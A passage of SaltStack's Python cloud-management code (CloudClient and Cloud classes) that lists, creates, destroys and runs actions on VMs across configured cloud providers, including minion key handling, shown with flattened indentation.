salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in pillars.pop("providers", {}).items():
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in pillars.pop("profiles", {}).items():
provider = profile["provider"].split(":")[0]
driver = next(iter(self.opts["providers"][provider].keys()))
profile["provider"] = "{}:{}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in pillars.pop("maps", {}).items():
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in tmp_profiles.values()
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create, names is a list of vm names to allocate
vm_overrides is a special dict that will be per node options
overrides
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, str):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, str):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{}".format(next(iter(providers[provider].keys())))
else:
return False
if isinstance(names, str):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{}".format(next(iter(providers[provider].keys())))
else:
return False
if isinstance(names, str):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud:
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in self.opts["providers"].items():
if len(drivers) > 1:
for driver in drivers:
providers.add("{}:{}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in self.opts["providers"].items():
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{}'. Available: {}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in self.opts["providers"].items():
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{}'. "
"Available selections: {}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in self.opts["profiles"].items():
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in self.opts["providers"].items():
for driver, details in drivers.items():
fun = "{}.{}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in opts["providers"].items():
# Make temp query for this driver to avoid overwrite next
this_query = query
for driver, details in drivers.items():
# If driver has function list_nodes_min, just replace it
# with query param to check existing vms on this driver
# for minimum information, Otherwise still use query param.
if (
opts.get("selected_query_option") is None
and "{}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{}.{}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There's no providers details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, str):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in mapped_providers.items():
for driver, vms in drivers.items():
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in vms.items():
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in providers.items():
for name, data in driver.items():
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in provider_by_driver.items():
fun = "{}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in providers_data.items():
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in new_data.items():
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in self.opts["profiles"].items():
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in matching.items():
for driver, vms in drivers.items():
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys for which their minion
# configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we can't also get the append_domain setting.
# And if we reached this point, we have several minion keys
# who's name starts with the machine name we're deleting.
# We need to ask one by one!?
print(
"There are several minion keys who's name starts "
"with '{}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {}: {}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{}'".format(filename))
break
print("Did not delete '{}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in pmap.items():
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in acts.items():
fun = "{}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
with salt.client.get_local_client(mopts=mopts_) as client:
ret = client.cmd(
vm_["name"],
"saltutil.sync_{}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
"Synchronized the following dynamic modules: "
" {}".format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
with salt.client.get_local_client(mopts=self.opts) as client:
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{}.{}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except OSError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in mapped_providers.items():
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{} already exists under {}:{}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in self.map_providers_parallel().items():
if not names:
break
for driver, vms in drivers.items():
if not names:
break
valid_function = True
fun = "{}.{}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in vms.items():
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in invalid_functions.items():
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
# Don't return missing VM information for invalid functions until after we've had a
# Chance to return successful actions. If a function is valid for one driver, but
# Not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
# If we reach this point, the Not Actioned and Not Found lists will be the same,
# But we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{}'. Please specify "
"one of: {}".format(
prov,
", ".join(
["{}:{}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{}.{}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{}' cloud provider alias, for the '{}' driver, does "
"not define the function '{}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in self.opts["providers"].copy().items():
for driver in drivers.copy():
fun = "{}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
